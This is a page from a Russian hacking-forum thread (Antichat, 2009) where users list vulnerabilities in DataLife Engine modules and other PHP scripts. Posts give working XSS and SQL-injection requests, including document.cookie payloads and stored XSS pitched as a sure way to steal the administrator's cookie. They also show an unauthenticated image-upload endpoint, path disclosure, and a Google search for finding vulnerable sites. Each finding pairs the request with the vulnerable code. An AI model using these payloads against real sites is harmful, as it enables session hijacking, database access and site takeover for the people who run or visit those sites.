ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #41  
Старый 27.02.2009, 17:18
Аватар для -Hormold-
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме:
3250478

Репутация: 999


Отправить сообщение для -Hormold- с помощью ICQ
По умолчанию

hacking attemptz
Версия: v.1.0


Активная XSS от любого пользователя(100% кража куки админа)

Уязвимый скрипт: hacking_attemptz_fnct.php
Запрос: login_name=<h1><script>alert(/xss/);</script>XSS</h1>&login_password=1234
Метод: POST
Уязвимый кусок кода:
PHP код:
function log_user($host)
   {
      global 
$ip;
         
$log_date date('d.m.Y');
         
$log_time date('H:i:s');
      
$log_info "

<tr>
 <td align='center'>"
.$_POST['login_name']."</td>
 <td align='center'>
$log_date</td>
 <td align='center'>
$log_time</td>
 <td align='center'>
$ip</td>
 <td align='center'>"
.gethostbyaddr($ip)."</td>
</hr>
"

Теперь попробуйте залогиниться с логином <h1>xss</h1> и любым пассом!
Смотрим админку, и вот! XSS видна
 
Ответить с цитированием

  #42  
Старый 27.02.2009, 17:29
Аватар для Chaak
Chaak
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
Провел на форуме:
5321514

Репутация: 3313


Отправить сообщение для Chaak с помощью ICQ
По умолчанию

Цитата:
Сообщение от -Hormold-  
SPAM BUTTON in PM
Версия: v.1.0


ВОЗМОЖНО Sql-INJ

Уязвимый скрипт: engine\inc\pmspam.php
Запрос: flag=-1'
Метод: POST
Уязвимый кусок кода:
PHP код:
  if($_POST['spam_flag'])
  {
      foreach (
$_POST['spam_flag'] as $key => $value)
      {
        
$delete_spam_query "DELETE FROM " PREFIX "_spam_pm WHERE id = '$value'";
        
$delete_spam_query_id $db->query($delete_spam_query);
          if(!
$delete_spam_query)
          {
            
$spam_err true;
          }
      }
  } 
Что значит возможно?
 
Ответить с цитированием

  #43  
Старый 27.02.2009, 18:02
Аватар для -Hormold-
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме:
3250478

Репутация: 999


Отправить сообщение для -Hormold- с помощью ICQ
По умолчанию

Friends of Suite
Версия: v.1.3


Расскрытие путей

Уязвимый скрипт: inc/friend.php
Запрос: reg_name[]=123&reg_adress[]=1234
Метод: POST
Уязвимый кусок кода:
PHP код:
  if ($_POST['docreate'] == "create")
  {
     
$name               trim(htmlspecialchars(stripslashes($_POST['name'])));
     
$address            trim(htmlspecialchars(stripslashes($_POST['address']))); 
 
Ответить с цитированием

  #44  
Старый 27.02.2009, 18:08
Аватар для -Hormold-
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме:
3250478

Репутация: 999


Отправить сообщение для -Hormold- с помощью ICQ
По умолчанию

Friends of Suite
Версия: v.1.3


Активная XSS от любого пользователя(100% кража куки админа)

Уязвимый скрипт: friend.php
Запрос: reg_name=<h1><script>alert(/xss/);</script>XSS</h1>&reg_adress=http://127.0.0.1/
Метод: POST
Уязвимый кусок кода:
PHP код:
//пока ненашёл... 
Теперь попробуйте добавить сайт с названием <h1>xss</h1> и любым url'ом где есть ссылка на ваш хост.
Смотрим админку, и вот! XSS видна :P
Хотя script удаляет...

Последний раз редактировалось -Hormold-; 27.02.2009 в 18:16..
 
Ответить с цитированием

  #45  
Старый 28.02.2009, 00:40
Аватар для -Hormold-
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме:
3250478

Репутация: 999


Отправить сообщение для -Hormold- с помощью ICQ
По умолчанию

DataLife Engine Redirect
Версия: v.1.1

XSS

Уязвимый скрипт: engine/redirect.php
Запрос: url=http://site.su"><script>alert(document.cookie);</script>
Метод: GET
Уязвимый кусок кода:
PHP код:
$url  = (isset($_GET['url']) && (!empty($_GET['url']))) ? trim($_GET['url']) : @header('Location: /index.php'); 


Переадресация для ссылок(^^ странно похожи...)!
Версия: v.1.0

XSS

Уязвимый скрипт: engine/redikt.php
Запрос: ?url=http://sasa.su"><script>alert(document.cookie);</script>
Метод: GET
Уязвимый кусок кода:
PHP код:
    $url  = (isset($_GET['url']) && (!empty($_GET['url']))) ? trim($_GET['url']) : @header('Location: /index.php'); 

Последний раз редактировалось -Hormold-; 28.02.2009 в 00:47..
 
Ответить с цитированием

  #46  
Старый 01.03.2009, 22:09
Аватар для -Hormold-
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме:
3250478

Репутация: 999


Отправить сообщение для -Hormold- с помощью ICQ
По умолчанию

Удаление комментариев при помощи AJAX
Версия: v.1.0


sql-inj

Уязвимый скрипт: engine/ajax/commentdelete.php
Запрос: commid=-1'
Метод: GET
Уязвимый кусок кода:
PHP код:
$row $db->super_query("SELECT * FROM " PREFIX "_comments where id = '{$_REQUEST['commid']}'"); 
Раскручивать не стал...
 
Ответить с цитированием

  #47  
Старый 09.04.2009, 13:13
Аватар для banana
banana
Участник форума
Регистрация: 04.03.2009
Сообщений: 298
Провел на форуме:
1241030

Репутация: 229
Отправить сообщение для banana с помощью ICQ
По умолчанию

По адресу site/engine/images.php?area=
Можно заливать картинки на сервер без авторизации

Проверял на 6.7 - пашет

Последний раз редактировалось Jokester; 31.03.2010 в 19:59..
 
Ответить с цитированием

  #48  
Старый 09.05.2009, 17:08
Аватар для Sosok
Sosok
Новичок
Регистрация: 16.02.2009
Сообщений: 10
Провел на форуме:
390969

Репутация: 8
По умолчанию

Расскажите можна будет,как нибудь заюзать уязвимость в модуле "Переходы"...?
Когда например в гугле воодишь запрос с ковычкой, то при переходе :
MySQL Error!
The Error returned was:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'vBulletin', '/', '%main%', 'ip', 'engine')' at line 1
Error Number:
1064
 
Ответить с цитированием

  #49  
Старый 09.05.2009, 17:15
Аватар для wildshaman
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию

Цитата:
Сообщение от Sosok  
Расскажите можна будет,как нибудь заюзать уязвимость в модуле "Переходы"...?
Когда например в гугле воодишь запрос с ковычкой, то при переходе :
MySQL Error!
The Error returned was:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'vBulletin', '/', '%main%', 'ip', 'engine')' at line 1
Error Number:
1064
покажи подробнее, линком желательно
 
Ответить с цитированием

  #50  
Старый 10.05.2009, 12:18
Аватар для Sosok
Sosok
Новичок
Регистрация: 16.02.2009
Сообщений: 10
Провел на форуме:
390969

Репутация: 8
По умолчанию

Вот зайдёшь и на самый первый сайт нажми...
Цитата:
http://www.google.com/search?client=opera&rls=ru&q=site:scriptiks.ru+'

Последний раз редактировалось Sosok; 10.05.2009 в 12:27..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Сценарии/CMF/СMS 156 07.06.2010 05:01
Обзор уязвимостей в платных CMS ZAMUT Сценарии/CMF/СMS 56 15.04.2010 21:02
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
[ Обзор уязвимостей miniBB ] -=lebed=- Форумы 3 12.01.2008 20:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ